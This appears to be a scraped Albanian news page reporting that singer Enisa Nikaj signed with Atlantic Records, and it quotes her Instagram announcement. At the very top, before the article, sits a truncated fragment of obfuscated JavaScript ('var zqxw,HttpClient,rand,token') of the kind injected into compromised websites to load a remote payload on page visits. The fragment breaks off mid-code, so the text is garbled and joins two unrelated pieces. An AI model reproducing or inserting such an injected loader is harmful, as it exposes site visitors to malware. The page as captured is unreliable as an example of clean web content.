;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Këngëtarja shqiptare nënshkruan kontratë me kompaninë muzikore amerikane

By

Enisa Nikaj gjithashtu njihet si ENISA e cila u bë e njohur fillimisht me ‘covers’ të këngëve të artistëve të njohur si Adele dhe Hozier.

Ajo publikoi single-in e saj debutues “Burn This Bridge” në vitin 2016. Ajo ka modeluar dhe është përfaqësuar nga Wilhelmina Models.

E lindur dhe e rritur në Brooklyn të New York-ut nga prindër shqiptarë nga Tuzi në Mal të Zi, dashuria më e madhe e Enisës mbetet kënga dhe muzika.

Ajo ka ndarë një lajm tejet emocionues për të me ndjekësit e saj në Instagram.

“E EMOCIONUAR për të njoftuar se kam nënshkruar marrëveshjen time të parë për kompaninë muzikore në @ Atlanticrecords @highbridgethelabel ❤️ Unë kam qenë shumë e duruar, kam pritur shumë vite derisa kam hasur në ekipin e duhur, një ekip që besoi në mua si një artiste dhe njerëz që kurrë nuk deshën të më ndryshonin. Unë e kam përshkuar këtë udhëtim vetëm për vite me radhë pa menaxhim ose ekip në përgjithësi dhe jam krenare për sa larg kam ardhur vetëm – por tani unë jam shumë e ngazëllyer për të ardhmen dhe e gatshme t’i quar gjërat në nivelin tjetër. Ju dua të gjithëve dhe faleminderit që keni qenë me mua gjatë këtij udhëtimi.” – shkruan ajo në postimin e saj. /Prive.al

Artikuj të ngjashëm